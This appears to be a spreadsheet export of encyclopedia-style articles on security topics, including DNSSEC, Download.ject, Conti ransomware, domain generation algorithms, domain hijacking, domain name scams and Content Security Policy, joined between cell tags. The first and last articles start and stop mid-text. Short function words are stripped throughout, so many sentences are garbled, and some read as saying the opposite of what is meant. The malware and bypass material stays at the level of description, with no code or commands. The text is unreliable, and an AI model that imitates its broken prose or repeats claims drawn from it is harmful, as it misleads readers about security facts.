forced using offline dictionary attacks. nsec5 proposed allow authoritative servers sign nsec responses without keep private used modify zone. thus stealing nsec5key would result ability easily enumerate zone.due messy evolution protocol desire preserve backwards compatibility, online dnssec signing servers return "white lie" instead authenticating denial existence directly. technique outlined 4470 returns nsec record pairs domains lexically surrounding requested domain. example, request k.example.com would thus result nsec record proving nothing exists (fictitious) domains j.example.com l.example.com. this also possible nsec3 records.cloudflare pioneered pair alternative approaches, manage achieve result third response size. first variation "white lies" approach, called "black lies", exploits common client behavior state nonexistence compactly. second approach instead chooses prove "the record exists requested record type not", call "dns shotgun". deployment internet critical infrastructure, operation depends fundamentally insecure dns. thus, strong incentive secure dns, deploying dnssec generally considered critical part effort. example, u.s. national strategy secure cyberspace specifically identified need secure dns. wide-scale deployment dnssec could resolve many security problems well, secure distribution e-mail addresses. dnssec deployment large-scale networks also challenging. ozment schechter observe dnssec (and technologies) "bootstrap problem": users typically deploy technology receive immediate benefit, minimal level deployment required users receive benefit greater costs true dnssec), difficult deploy. dnssec deployed level hierarchy, must widely available zone many others want adopt servers must updated software supports dnssec, dnssec data must created added zone data. tcp/ip-using client must resolver (client) updated dnssec's capabilities. what more, resolver must have, acquire, least public trust start using dnssec. dnssec implementation significant load servers. common dnssec-signed responses larger default size bytes. theory, handled multiple fragments, many "middleboxes" field handle correctly. this leads instead. many current implementations store great deal data connection; heavily loaded servers resources simply trying respond larger number (possibly bogus) dnssec requests. some protocol extensions, cookie transactions, developed reduce loading. address challenges, significant effort ongoing deploy dnssec, internet vital many organizations. early deployments early adopters include brazil (.br), bulgaria (.bg), czech republic (.cz), namibia (.na) puerto rico (.pr) sweden (.se), dnssec country code top-level domains; ripe ncc, signed reverse lookup records (in-addr.arpa) delegated internet assigned numbers authority (iana). arin also signing reverse zones. february 2007, became first swedish start offering feature customers.iana publicly tested sample signed root since june 2007. during period prior production signing root, also several alternative trust anchors. jena introduced january 2006, internet systems consortium introduced another march year, icann announced third february 2009.on june 2009, afilias, registry service provider public interest registry's .org zone signed .org tld. afilias also detailed september 2008, first phase, involving large registrars strong working relationship ("friends family") would first able sign domains, beginning "early 2009". june 2010, registrars listed offering dnssec records .org domains.verisign pilot project allow .com .net domains register purpose nsec3 experimentation. february 2009, announced would deploy dnssec across top-level domains (.com, .net, etc.) within months, november year, said .com .net domains would signed first quarter 2011, delays caused technical aspects implementation. this goal achieved on-schedule verisign's dnssec matt larson, infoworld's technology leadership award 2011 role advancing dnssec. deployment root dnssec first deployed root level july 2010. this expected greatly simplify deployment dnssec resolvers, since root trust anchor used validate dnssec zone complete chain trust root. since chain trust must traced back trusted root without interruption order validate, trust anchors must still configured secure zones zones secure. example, zone "signed.example.org" secured "example.org" zone not, then, even though ".org" zone root signed, trust anchor deployed order validate zone. political issues surrounding signing root continuous concern, primarily central issues: other countries concerned u.s. control internet, reject centralized keying reason. some governments might dnssec-backed encryption distribution. planning september 2008, icann verisign published implementation proposals october, national telecommunications information administration (ntia) asked public comments. unclear comments received affected design final deployment plan. june 2009, national institute standards technology (nist) announced plans sign root 2009, conjunction icann, verisign ntia.on october 2009, 59th ripe conference meeting, icann verisign announced planned deployment timeline deploying dnssec within root zone. meeting announced would incrementally deployed root name server month, starting december 2009, final root name server serving dnssec signed zone july 2010, root zone signed rsa/sha256 dnskey. during incremental roll-out period root zone serve deliberately unvalidatable root zone (durz) uses dummy keys, final dnskey record distributed july 2010. this means keys used sign zone deliberately unverifiable; reason deployment monitor changes traffic patterns caused larger responses queries requesting dnssec resource records. .org top-level domain signed dnssec june 2010, followed .com, .net, .edu later 2010 2011. country code top-level domains able deposit keys starting 2010. november 2011 top-level domains signed dnssec. implementation january 2010, (ell) root server began serving deliberately unvalidatable root zone (durz). zone uses signatures sha-2 (sha-256) hash created using algorithm, defined 5702. 2010, thirteen root servers begun serving durz. july 2010, first root full production dnssec root zone signed, serial 2010071501. root trust anchors available iana. deployment level underneath root large top-level domains must signed order achieve full dnssec deployment. list internet top-level domains provides details existing top-level domains signed linked root. dnssec lookaside validation historical march 2006, internet systems consortium introduced dnssec lookaside validation registry. intended make dnssec easier deploy absence root trust anchor. time imagined validator might maintain large numbers trust anchors corresponding signed subtrees dns. purpose allow validators offload effort managing trust anchor repository trusted third party. registry maintained central list trust anchors, instead validator repeating work maintaining list. dlv, validator supports needed, bind unbound, configured trust anchor zone. this zone contained records; exactly format records, instead referring delegated sub-zone, referred zone elsewhere tree. when validator could find chain trust root rrset trying check, searched record could provide alternative chain trust.gaps chain trust, unsigned top-level domains registrars support dnssec delegations, meant administrators lower-level domains could allow data validated resolvers configured dlv. this hindered dnssec deployment taking pressure registrars registries properly support dnssec. also added complexity adding actors code paths dnssec validation. decommissioned registry 2017. support deprecated bind 9.12 completely removed bind 9.16. unbound version 1.5.4 (july 2015) marked decommissioned example configuration manual page. knot resolver powerdns recursor never implemented dlv. march 2020, ietf published 8749, retiring standard moving 4432 5074 "historic" status. dnssec deployment initiative u.s. federal government science technology directorate u.s. department homeland security (dhs) sponsors "dnssec deployment initiative". this initiative encourages "all sectors voluntarily adopt security measures improve security internet's naming infrastructure, part global, cooperative effort involves many nations organizations public private sectors." also funds efforts mature dnssec deployed inside u.s. federal government. reported march 2007, u.s. department homeland security proposed sign root zone solidly hands government." however u.s. government officials present meeting room comment sparked article made another party. later commented believe others jumped false conclusion u.s. government made proposal: "the u.s. department homeland security funding development technical plan implementing dnssec, last october distributed initial draft long list international experts comments. draft lays series options could holder, "operator," root zone key, essentially boiling governmental agency contractor. "nowhere document make proposal identity root operator," said maughan, cyber-security research development manager homeland security." dnssec deployment u.s. federal government national institute standards technology (nist) published nist special publication 800-81 secure domain name system (dns) deployment guide 2006, guidance deploy dnssec. nist intended release dnssec federal information security management (fisma) requirements nist sp800-53-r1, referencing deployment guide. u.s. agencies would year final publication nist sp800-53-r1 meet fisma requirements. however, time nsec3 completed. nist suggested using split domains, technique known possible difficult deploy correctly, security weaknesses noted above. august 2008, office management budget (omb) released memorandum requiring u.s. federal agencies deploy dnssec across .gov sites; .gov root must signed january 2009, subdomains .gov must signed december 2009. while memo focuses .gov sites, u.s. defense information systems agency says intends meet dnssec requirements .mil (u.s. military) domain well. networkworld's carolyn duffy marsan stated dnssec "hasn't widely deployed suffers classic chicken-and-egg dilemma... mandate, appears cracking." deployment resolvers several isps started deploy dnssec-validating recursive resolvers. comcast became first major united states, announcing intentions october 2010 completing deployment january 2012.according study apnic, proportion clients exclusively resolvers perform dnssec validation rose 8.3% 2013. about half clients using google's public resolver. september 2015, verisign announced free public resolver service, although unmentioned press releases, also performs dnssec validation. beginning 2016, apnic's monitoring showed proportion clients exclusively resolvers perform dnssec validation increased 15%. dnssec support google's public recursive server enabled dnssec validation 2013.bind, popular management software, enables dnssec support default since version 9.5. quad9 public recursive performed dnssec validation main 9.9.9.9 address since established 2016. quad9 also provides alternate service perform dnssec validation, principally debugging. ietf publications 2535 domain name system security extensions 3225 indicating resolver support dnssec 3226 dnssec ipv6 aware server/resolver message size requirements 3833 threat analysis domain name system 4033 security introduction requirements (dnssec-bis) 4034 resource records security extensions (dnssec-bis) 4035 protocol modifications security extensions (dnssec-bis) 4398 storing certificates domain name system (dns) 4431 dnssec lookaside validation (dlv) resource record 4470 minimally covering nsec records dnssec on-line signing 4509 sha-256 dnssec delegation signer (ds) resource records (rrs) 4641 dnssec operational practices 4955 security (dnssec) experiments 5011 automated updates security (dnssec) trust anchors 5155 dnssec hashed authenticated denial existence 5702 sha-2 algorithms dnskey rrsig resource records dnssec 6605 elliptic curve digital signature algorithm (dsa) dnssec 6725 security (dnssec) dnskey algorithm iana registry updates 6781 dnssec operational practices, version 6840 clarifications implementation notes security (dnssec) 7129 authenticated denial existence 7344 automating dnssec delegation trust maintenance 7583 dnssec rollover timing considerations 8080 edwards-curve digital security algorithm (eddsa) dnssec 8624 algorithm implementation requirements usage guidance dnssec 8749 moving dnssec lookaside validation (dlv) historic status 9276 guidance nsec3 parameter settings tools dnssec deployment requires software server client side. some tools support dnssec include: windows windows server 2008 include "security-aware" stub resolver able differentiate secure non-secure responses recursive name server. windows server 2012 dnssec compatible secure dynamic updates active directory-integrated zones, plus active directory replication anchor keys servers. bind, popular name server (which includes dig), incorporates newer dnssec-bis records) protocol well support nsec3 records. unbound name server written ground designed around dnssec concepts. mysqlbind management software asps supports dnssec. opendnssec designated dnssec signer tool using pkcs#11 interface hardware security modules. knot added support automatic dnssec signing version 1.4.0. powerdns fully supports dnssec version pre-signed live-signed modes. dnssec: what important implement long time? check initiative internet community dutch government also dnscrypt dnscurve extension mechanisms (edns) tsig resource public infrastructure (rpki) references further reading yang; osterweil; massey; zhang april 2010). "deploying cryptography internet-scale systems: case study dnssec". ieee transactions dependable secure computing. (5): 656–669. citeseerx 10.1.1.158.1984. doi:10.1109/tdsc.2010.10. s2cid 14887477. external links dnssec dnssec information site: dnssec.net dnsext extensions ietf working group dnssec-tools project</t>
  </si>
  <si>
    <t>Dr Solomon's Antivirus</t>
  </si>
  <si>
    <t>solomon's antivirus toolkit antivirus suite incorporated prevention, detection repair microsoft windows 98), novell, unix, solaris os/2. written alan solomon international. history solomon's anti-virus toolkit first created 1988 launched commercially 1991. this move rival market leaders symantec's norton anti-virus mcafee virusscan. solomon's several computer magazine awards recommendations. jerry pournelle recommended column byte magazine 1992, recently wrote "solomon's unreservedly best virus service around." 1993, solomon's anti-virus toolkit awarded queens award technological achievement. time company name "s&amp;s international". later became "dr. solomon's software ltd." similarly named companies germany, united states australia. 1997, infoworld stated solomon’s “best detecting viruses”.after previous tension software products, june 1998, mcafee (then known network associates) agreed acquire solomon's group plc, leading european manufacturer antivirus software, $642 million stock. references external links official site saved archive.org</t>
  </si>
  <si>
    <t>Download.ject</t>
  </si>
  <si>
    <t>computing, download.ject (also known toofer scob) malware program microsoft windows servers. when installed insecure website running microsoft internet information services (iis), appends malicious javascript pages served site. download.ject first noted case users internet explorer windows could infect computers malware backdoor logger) merely viewing page. came prominence widespread attack starting june 2004, infected many servers including several hosted financial sites. security consultants prominently started promoting opera mozilla firefox instead wake attack. download.ject virus worm; spread itself. june attack hypothesised place automatic scanning servers running iis. attack june 2004 hackers placed download.ject financial corporate websites running windows 2000, breaking using known vulnerability. patch existed vulnerability, many administrators applied it.) attack first noticed june although researchers think place early june download.ject appended fragment javascript pages compromised servers. when page server viewed internet explorer (ie) windows, javascript would run, retrieve copy various backdoor logging programs server located russia install user's machine, using holes patch available, without. these vulnerabilities present versions windows except version included windows service pack beta testing time. both server browser flaws exploited this. this attack notable, however, combining two, placed upon popular mainstream websites (although list affected sites released) network compromised sites used attack reportedly numbering thousands, previous compromised network. microsoft advised users remove infection browse security settings maximum. security experts also advised switching javascript, using browser internet explorer, using operating system windows, staying internet altogether. this particular attack neutralised june server download.ject installed backdoor shut down. microsoft issued patch windows 2000, 2003 july although sizable attack compared email worms time, fact almost existing installations browsers time vulnerable, latest series holes leaving underlying operating system vulnerable, caused notable wave concern press. even business press started advising users switch browsers, despite then-prerelease windows invulnerable attack. also browser wars references external links technical information server compromises (cert, june 2004) compromised sites infect surfers (sans internet storm center, june 2004) berbew/webber/padodor trojan analysis (lurhq threat intelligence group, june 2004) analysis backdoor program installed users' what should know about download.ject (microsoft, june 2004) microsoft statement regarding download.ject malicious code security issue (microsoft, june 2004) microsoft security bulletin ms04-011: security update microsoft windows (835732) (microsoft, april 2004) patch server flaw mhtml processing vulnerability (common vulnerabilities exposures, april 2004) flaw patch available time internet explorer cross-zone vulnerability exploitation (internet security systems, june 2004) flaw patch available time disable adodb.stream object internet explorer (microsoft knowledge base article 870669) patch second flaw press coverage cfcu site infects ithaca customers' computers (mark anbinder, 14850 today, june 2004) experts studying internet attack (associated press, june 2004) researchers warn infectious sites (robert lemos, zdnet, june 2004) site virus attack blunted (robert lemos, cnet, june 2004) internet attack slowing down (george hulme, information week, june 2004) virus designed steal windows users' data: hundreds sites targeted (brian krebs, washington post, june 2004, page a01) flaw boost rival browsers (robert lemos paul festa, cnet, june 2004) what's flaw about? (stephen wildstrom, business week, june 2004) internet explorer just risky (stephen wildstrom, business week, june 2004) browser wars back?: mozilla's firefox trumps internet explorer (paul boutin, slate, june 2004) bruce schneier: microsoft still work (bill brenner, searchsecurity.com, october 2004)</t>
  </si>
  <si>
    <t>Domain controller (Windows)</t>
  </si>
  <si>
    <t>microsoft servers, domain controller (dc) server computer responds security authentication requests (logging etc.) within windows domain. domain concept introduced windows whereby user granted access number computer resources single username password combination. history with windows server, domain controller domain configured primary domain controller (pdc); domain controllers backup domain controllers (bdc). because critical nature pdc, best practices dictated dedicated solely domain services, used file, print application services could slow crash system. some network administrators took additional step dedicated online express purpose available promotion failed. could authenticate users domain, updates domain (new users, changed passwords, group membership, etc.) could made pdc, would propagate changes bdcs domain. unavailable unable communicate user requesting change), update would fail. permanently unavailable (e.g. machine failed), existing could promoted pdc. windows 2000 later versions introduced active directory ("ad"), largely eliminated concept favor multi-master replication. however, still several roles domain controller perform, called flexible single master operation roles. some roles must filled domain, others require forest. server performing roles lost, domain still function, server available again, administrator designate alternate assume role process known "seizing" role. primary domain controller windows serves primary domain controller (pdc). others, exist, usually backup domain controller (bdc). typically designated "first". "user manager domains" utility maintaining user/group information. uses domain security database primary controller. master copy user accounts database access modify. computers copy database, copies read-only. replicate account database bdcs regular basis. bdcs exist order provide backup pdc, also used authenticate users logging network. fail, bdcs promoted take place. usually first domain controller created unless replaced promoted bdc. emulation (primary domain controller) modern releases windows, domains supplemented active directory services. active directory domains, concept primary secondary domain controller relationships longer applies. emulators hold accounts databases administrative tools. result, heavy workload slow system down. service installed secondary emulator machine relieve workload emulator. rules apply; exist domain, multiple replication servers still used. emulator master acts place windows domain controllers (bdcs) remaining within domain, acting source replicate from. emulator master receives preferential replication password changes within domain. password changes take time replicate across domain controllers active directory domain, emulator master receives notification password changes immediately, logon attempt fails another domain controller, domain controller forward logon request emulator master rejecting emulator master also serves machine domain controllers domain synchronise clocks. turn, configured synchronise external time source. samba primary domain controllers (pdc) faithfully recreated samba emulation microsoft's client/server system. samba capability emulate domain, well modern active directory domain services linux machine. backup domain controller windows domains, backup domain controller (bdc) computer copy user accounts database. unlike accounts database pdc, database read-only copy. when changes made master accounts database pdc, pushes updates bdcs. these additional domain controllers exist provide fault tolerance. fails, replaced bdc. circumstances, administrator promotes pdc. bdcs also authenticate user logon requests take authentication load pdc. when windows 2000 released, domain found prior versions replaced active directory. active directory domains running native mode, concept exist. domains, domain controllers considered equals. side effect change loss ability create "read-only" domain controller. windows server 2008 reintroduced capability. nomenclature windows server three kinds: active directory "domain controllers" (ones provide identity authentication), active directory "member servers" (ones provide complementary services file repositories schema) windows workgroup "stand-alone servers". term "active directory server" sometimes used microsoft synonymous "domain controller" term discouraged. references external links domain controllers located windows pre-integrated open source domain controller</t>
  </si>
  <si>
    <t>Conti (ransomware)</t>
  </si>
  <si>
    <t>conti ransomware observed since 2020, believed distributed russia-based group. versions microsoft windows known affected. united states government offered reward million information group early 2022. threat details software uses implementation aes-256 uses individual logical threads, making much faster ransomware. method delivery clear.the gang behind conti operated site leak documents copied ransomware since 2020. gang operated ryuk ransomware. group known wizard spider based saint petersburg, russia. behaviour once system delete volume shadow copies. terminate number services using restart manager ensure encrypt files used them. disable real time monitor uninstall windows defender application. default behaviour encrypt files local networked server message block drives, ignoring files dll, .exe, .sys .lnk extensions. also able target specific drives well individual addresses. remediation according digital guaranteed recover restore affected files recent backup. leaks during 2022 russian invasion ukraine, conti group announced support russia threatened deploy "retaliatory measures" cyberattacks launched country. result, approximately 60,000 messages internal chat logs leaked anonymous person indicated support ukraine along source code files used group.the leaks cover time start 2020 february 2022 consists 60,000 chat messages. most leaked messages direct messages sent jabber. attacks coordinated using rocket.chat. leaks fragmented.some messages discuss actions cozy bear hacking researchers covid-19. kimberly goody, director cybercrime analysis mandiant says references unnamed external source logs could helpful gang. points mention leaks liteyny avenue saint petersburg, home local offices, evidence external source could russian government.views expressed leaks include support vladimir putin, vladimir zhirinovsky, antisemitism (including towards volodymyr zelenskyy). member known patrick repeated several false claims made putin ukraine. patrick lives australia russian citizen.some messages show obsession brian krebs.the messages heavily. messages containing homophobia, misogyny references child abuse also found. membership structure senior member known aliases stern demon acts ceo. another member known mango acts general manager frequently communicates stern. mango told stern message people main team. numbers involved fluctuate, reaching high 100. because constant turnover members, group recruits constantly legitimate recruitment sites hacker sites.ordinary programmers earn around $1500 $2000 month, members negotiating ransom payments take share profits. april 2021 member claimed unnamed journalist took share ransomware payments pressuring victims up.in 2022, united states government offered reward million information group: million identity location leaders, million information leading arrest anyone conspiring research vmware carbon black published technical report ransomware. known targets scottish environment protection agency face health service executive republic ireland. waikato district health board zealand. shutterfly. snacks. nordic choice hotels references</t>
  </si>
  <si>
    <t>Domain generation algorithm</t>
  </si>
  <si>
    <t>domain generation algorithms (dga) algorithms seen various families malware used periodically generate large number domain names used rendezvous points command control servers. large number potential rendezvous points makes difficult enforcement effectively shut botnets, since infected computers attempt contact domain names every receive updates commands. public-key cryptography malware code makes unfeasible enforcement actors mimic commands malware controllers worms automatically reject updates signed malware controllers. example, infected computer could create thousands domain names www.&lt;gibberish&gt;.com would attempt contact portion purpose receiving update commands. embedding instead list previously-generated command control servers) domains unobfuscated binary malware protects strings dump could network blacklisting appliance preemptively attempt restrict outbound communication infected hosts within enterprise. technique popularized family worms conficker.a which, first generated domain names day. starting conficker.c, malware would generate 50,000 domain names every would attempt contact 500, giving infected machine possibility updated every malware controllers registered domain day. prevent infected computers updating malware, enforcement would needed pre-register 50,000 domain names every day. from point view botnet owner, register domains several domains would query every day. recently, technique adopted malware authors. according network security firm damballa, top-5 prevalent dga-based crimeware families conficker, murofet, bankpatch, bonnana bobax 2011.dga also combine words dictionary generate domains. these dictionaries hard-coded malware taken publicly accessible source. domains generated dictionary tend difficult detect similarity legitimate domains. example example, january 2014, method would generate domain name intgmxdeadnxuyla.com, following day, would return axwscwsslmiagfah.com. this simple example fact used malware like cryptolocker, switched sophisticated variant. detection domain names blocked using blacklists, coverage blacklists either poor (public blacklists) wildly inconsistent (commercial vendor blacklists). detection techniques belong main classes: reactionary real-time. reactionary detection relies non-supervised clustering techniques contextual information like network nxdomain responses, whois information, passive make assessment domain name legitimacy. recent attempts detecting domain names deep learning techniques extremely successful, scores 99%. these deep learning methods typically utilize lstm architectures, though deep word embeddings shown great promise detecting dictionary dga. however, deep learning approaches vulnerable adversarial techniques. also zeus (trojan horse) srizbi botnet references further reading phillip porras; hassen saidi; vinod yegneswaran (2009-03-19). analysis conficker's logic rendezvous points". malware threat center. international computer science laboratory. archived original 2013-02-03. retrieved 2013-06-14. lucian constantin (2012-02-27). "malware authors expand domain generation algorithms evade detection". world. retrieved 2013-06-14. hongliang liu, yuriy yuzifovich (2017-12-29). death match domain generation algorithms". akamai technologies. retrieved 2019-03-15. dgas hands cyber-criminals examining state malware evasion techniques dgas cyber-criminals: case study criminals defend their rogue networks, abuse.ch</t>
  </si>
  <si>
    <t>Domain hijacking</t>
  </si>
  <si>
    <t>domain hijacking domain theft changing registration domain name without permission original registrant, abuse privileges domain hosting registrar software systems.this devastating original domain name holder, financially derived commercial income website hosted domain conducted business domain's e-mail accounts, also terms readership and/or audience non-profit artistic addresses. after successful hijacking, hijacker domain name facilitate illegal activity phishing, website replaced identical website records private information log-in passwords, spam, distribute malware perceived "trusted" domain description domain hijacking done several ways, generally unauthorized access exploiting vulnerability domain name registrar's system, social engineering, getting domain owner's email account associated domain name registration.a frequent tactic used domain hijackers acquired personal information actual domain owner impersonate persuade domain registrar modify registration information and/or transfer domain another registrar, form identity theft. once done, hijacker full control domain sell third party. other methods include email vulnerability, vulnerability domain-registration level, keyloggers, phishing sites.responses discovered hijackings vary; sometimes registration information returned original state current registrar, difficult domain name transferred another registrar, particularly registrar resides another country. stolen domain name transferred another registrar, losing registrar invoke icann's registrar transfer dispute resolution policy seek return domain.in cases losing registrar domain name able regain control domain, domain name owner need pursue legal action obtain court ordered return domain. jurisdictions, police arrest cybercriminals involved, prosecutors file indictments.although legal status domain hijacking formerly thought unclear, certain u.s. federal courts particular begun accept causes action seeking return stolen domain names. domain hijacking analogous theft, original owner deprived benefits domain, theft traditionally relates concrete goods jewelry electronics, whereas domain name ownership stored digital state domain name registry, network computers. reason, court actions seeking recovery stolen domain names frequently filed location relevant domain registry. cases, victims pursued recovery stolen domain names icann's (uniform domain name dispute resolution policy (udrp), number udrp panels ruled policy appropriate cases involving domain theft. additionally, police arrest cybercriminals involved. notable cases during original "dot boom", extensive media coverage hijacking "sex.com". basketball player mark madsen unknowingly bought "stolen" hijacked) ebay auctions. 2015 lenovo's website google's main search page vietnam briefly hijacked. early 2021, perl’s domain briefly hijacked, causing relatively major issue cpan. early 2022, hypixel hijacked, players redirected page attempting fool players donating hacker's crypto wallets. page shortly afterwards redirected players music video. prevention icann imposes 60-day waiting period change registration information transfer another registrar. this intended make domain hijacking difficult, since transferred domain much difficult reclaim, likely original registrant discover change period alert registrar. extensible provisioning protocol used many registries, uses authorization code issued exclusively domain registrant security measure prevent unauthorized transfers.there certain steps domain-name owner take reduce exposure domain name hijacking. following suggestions prevent unwanted domain transfer: strong email passwords enable two-factor authentication available. disable email provider able different protocol. tick setting "always https" email options. frequently check "unusual activity" flag provided email service. two-step (two-factor) authentication available. make sure renew domain registration timely manner—with timely payments register least five years. domain-name registrar offers enhanced transfer protection, i.e., "domain locking" even consider paying registry locking. make sure whois information up-to-date really points only. 2500 domain names consider buying registrar. relief inter-registrar dispute process. rfc’s 3375 generic registry-registrar protocol requirements 3735 guidelines extending 3915 domain registry grace period mapping (e.g. grace period, redemption grace period) 4114 using enum addresses 5910 domain name system (dns) security extensions mapping extensible provisioning protocol (epp) (obsoletes 4310, dnssec) 5730 extensible provisioning protocol (epp) (obsoletes 4930, obsoleted 3730) 5731 extensible provisioning protocol (epp) domain name mapping (obsoletes 4931) 5732 extensible provisioning protocol (epp) host mapping (obsoletes 4932) 5733 extensible provisioning protocol (epp) contact mapping (obsoletes 4933) 5734 extensible provisioning protocol (epp) transport (obsoletes 4934) also cybercrime cybersquatting hijacking domain tasting references external links wall street journal: web-address theft everyday event office attorney general state jersey: first known conviction u.s. domain theft quotes landmark 2011 domain name theft case: first u.s. criminal conviction</t>
  </si>
  <si>
    <t>Domain name scams</t>
  </si>
  <si>
    <t>domain name scams types intellectual property scams confidence scams unscrupulous domain name registrars attempt generate revenue tricking businesses buying, selling, listing converting domain name. office fair trading united kingdom outlined types domain name scams "domain name registration scams" "domain name renewal scams". domain slamming domain slamming (also known unauthorized transfers domain name registration scams) scam offending domain name registrar attempts trick domain owners switching existing registrar theirs, pretense customer simply renewing subscription current registrar. term derives telephone slamming. prevention 2004, icann, domain name governing body, made changes policy transferring domains registrars. they introduced single protective measure help prevent unauthorized transfers: domain locking. critics, although advising owners apply feature, said "unnecessary customer-unfriendly change". false offers buy, find buyers scam methods operate reverse, stranger (not registrar) communicating offer domain name unwary owner. offer genuine, intended lure owner false sales process, owner eventually pressed send money advance scammer appraisal fees purported services. mimicking aspects legitimate sales process agencies, scheme appears genuine early stages. prospect easy, lucrative sale disarms owner's normal suspicion unsolicited offer stranger earnest value. since actual transfer registration system never involved, legal safeguards built official transfer process provide protection. fake trademark protection although less common domain slamming, another domain name scam primarily coming registrars based china involves sending domain owners e-mail claiming another company attempted register number domains contain targeted domain owner's trademark many keyword similarities existing domain name. often, domains one(s) owned targeted individual different tlds (top-level domains). scammer claim halted bulk registration order protect targeted individual's intellectual property, email recipient recognize entity attempting register domain names, respond immediately protect trademark. scam target respond email phone, scammer register domain names several years upfront registrar running scam.other variations type scam include registrars target existing customers similar made-up threats another entity trying register domain different tlds. well, domainers known search available tlds already registered domains, emailing owner registered domain offering sell unregistered variations him/her marked amount. target agrees deal, domainer purchase domains spot regular $7~20 registration immediately sell back victim hundred dollars. timeline this section outlines reported domain scams timeline events, showing evolved, companies involved outcome complaints. 2001, federal competition bureau canada) issued warning documents appeared invoices sent business called internet registry canada brandon gray reseller)."complaints received competition bureau indicate mailings 'internet registry canada' give impression affiliated government canada officially sanctioned agency registering domain names canada. 'internet registry canada' associated government agency," competition bureau advisory stated. verisign sued 2002 actions sending ambiguous emails informing people, often incorrectly, domain expire inviting click link renew renewing domain resulted registration company transferred verisign previous registrar. march 2002, shut "tld network ltd", "quantum management (gb) ltd.", "tbs industries ltd." london, england, selling bogus domain names ".usa", ".brit", deceptively marketed usable suffixes. april 2002, charged national domain name registry, electronic domain name monitoring, corporate domain name monitoring, owner darren morgenstern, making false misleading statements domain name holders whereby duped consumers needlessly registering variations existing domain names deceptively contending third parties claim them. july 2002, "domain registry" served papers canada-based domain registrar tucows alleged defamation sought damages. tucows later said: "the company (tucows) believe liable damages accordingly accrued amounts june 2002." 2002, register.com sued domain registry america brandon gray reseller), claiming company illegally lured away thousands customers tricking transferring domains. 2002, advertising watchdog authority (asa) slammed domain registry europe brandon gray reseller) similar mail shots.in response this, alan freeman, relations manager droe, said company also trades domain registry america domain registry canada registered million domains customers registering 5,000 7,000 domains day. 2003, dutch hosting provider deinternetman pondered legal action domain registry europe brandon gray reseller) sending customers letters urging renew domain contracts. 2003, verisign found broken barred suggesting domain expire transfer actually renewal. 2003, federal trade commission reached settlement domain registry america brandon gray reseller) practices transferring domain registrations service guise domain renewal, practice known domain slamming, hidden fees. july 2004, daniel klemann 1480455 ontario incorporated, operating internet registry canada brandon gray reseller), sentenced $40,000 fine five-year prohibition order deceptive internet domain name renewal mailouts targeted 73,000 businesses non-profit organizations across canada. april 2005, australian competition consumer commission warns domain name renewal scam domain name holders received letter looks like invoice registration renewal domain name, domain name question similar actual domain name except different ending, example “.net.au” instead “.com” march 2006, consumer fraud reporting reports company called “domain listing service” sending emails domain name holders look like bill register/renew domain name listing “final notice”. 2006, reports appeared zealand blair rafferty resurrected bankrupt brother chesley's domain name service, "domain slamming" zealand australian registrants. 2007, company known "domain renewal operating brussels sending emails told need renew domain. august 2007, internet centre reports wave emails originating china “asian domain registration service”, implying domain name lost, asian tlds domain name taken away shortly foreign company. internet centre found indication valid, fact, appear scam. 2007, reported company name liberty names america brandon gray reseller) sending "domain name expiration notices", expert said "not exactly domain name slamming. sleazy marketing." march 2008, news digest reports “network solutions scam”. when searching network solutions website name available registration, network solutions actually registering name attempting sell name inflated price. 2008, icann said: aware accredited registrars north america officers convicted mail fraud, continue associated deceptive marketing practices employed domain registry america brandon gray reseller). consider acceptable situation. accreditation processes must reviewed, review must released public scrutiny". 2009, released adjudication domain registry america domain renewal group (both brandon gray resellers). 2010, company mailing droa, french internet registry, domain renewal group company directory, order achieve domain slamming. mcafee labs also reports domain slamming solicitations continue. september 2010, brandon gray internet services inc. licence authority responsible canada's domain names, canadian internet registration authority terminated result domain slamming carried name domain registry canada. officer registered ontario government brandon gray internet services marilyn benlolo. august 2010, charged internet listing service sending fake invoices small business others listing existing domain name consumers website slight variation domain name. march 2011, office ostrolenk faber warned trademark domain name scams clients received fake warnings usurpers internet domain names. clients allegedly receiving phony "trademark office notices" "united states trademark agency". december 2011, namecheap accused godaddy putting technical barriers frustrate customers transferring domains namecheap breach icann rules. july 2014, icann suspended brandon gray internet services (including various resellers, like domain registry america namejuice.com) subjecting domain name holders false advertising, deceptive practices, deceptive notices. also copyfraud list confidence tricks: online scams scams intellectual property telephone slamming transfer secret notes entities resellers associated brandon gray include namejuice.com, domain registry america, domain renewal group, domain registry australia, domain registry canada, domain registry europe, internet registry canada, liberty names america, registration services inc, yellow business.ca internet corporation listing service. references</t>
  </si>
  <si>
    <t>Content Security Policy</t>
  </si>
  <si>
    <t>content security policy (csp) computer security standard introduced prevent cross-site scripting (xss), clickjacking code injection attacks resulting execution malicious content trusted page context. candidate recommendation working group application security, widely supported modern browsers. provides standard method website owners declare approved origins content browsers allowed load website—covered types javascript, css, html frames, workers, fonts, images, embeddable objects java applets, activex, audio video files, html5 features. status standard, originally named content restrictions, proposed robert hansen 2004, first implemented firefox quickly picked browsers. version standard published 2012 candidate recommendation quickly versions (level published 2014. 2015 draft level developed features quickly adopted browsers.the following header names part experimental implementations: content-security-policy standard header name proposed document. google chrome supports version firefox supports version released august 2013. webkit supports version (nightly build). chromium-based microsoft edge support similar chrome's. x-webkit-csp deprecated, experimental header introduced google chrome, safari webkit-based browsers 2011. x-content-security-policy deprecated, experimental header introduced gecko based browsers (firefox firefox thunderbird 3.3, seamonkey 2.1).a website declare multiple headers, also mixing enforcement report-only ones. each header processed separately browser. also delivered within html code using html meta tag, although case effectiveness limited.internet explorer internet explorer also support csp, sandbox directive, using experimental x-content-security-policy header.a number application frameworks support csp, example angularjs (natively) django (middleware). instructions ruby rails posted github. framework support however required contents somehow depend application's state—such usage nonce origin. otherwise, rather static delivered application tiers application, example load balancer server. 2015 number browser security standards proposed w3c, complementary csp: subresource integrity (sri), ensure known, trusted resource files (typically javascript, css) loaded third-party servers (typically cdns) mixed content, clarify intended browser's policy pages loaded https linking content plaintext http upgrade insecure requests, hinting browsers handle legacy links pages migrated https credential management, unified javascript access user's credentials facilitate complex login schemes, referrer policy, extension hint browser generation referer headers. bypasses december 2015 december 2016, methods bypassing 'nonce' allowlisting origins published. january 2016, another method published, leverages server-wide allowlisting exploit vulnerable versions javascript libraries hosted server (frequent case servers). 2017 method published bypass using application frameworks code. mode operation content-security-policy header present server response, compliant client enforces declarative allowlist policy. example goal policy stricter execution mode javascript order prevent certain cross-site scripting attacks. practice means number features disabled default: inline javascript code&lt;script&gt; blocks, event handlers html attributes (e.g. onclick) javascript: links inline statements &lt;style&gt; block style attributed html elements dynamic javascript code evaluationeval() string arguments settimeout setinterval functions function() constructor dynamic statements cssstylesheet.insertrule() 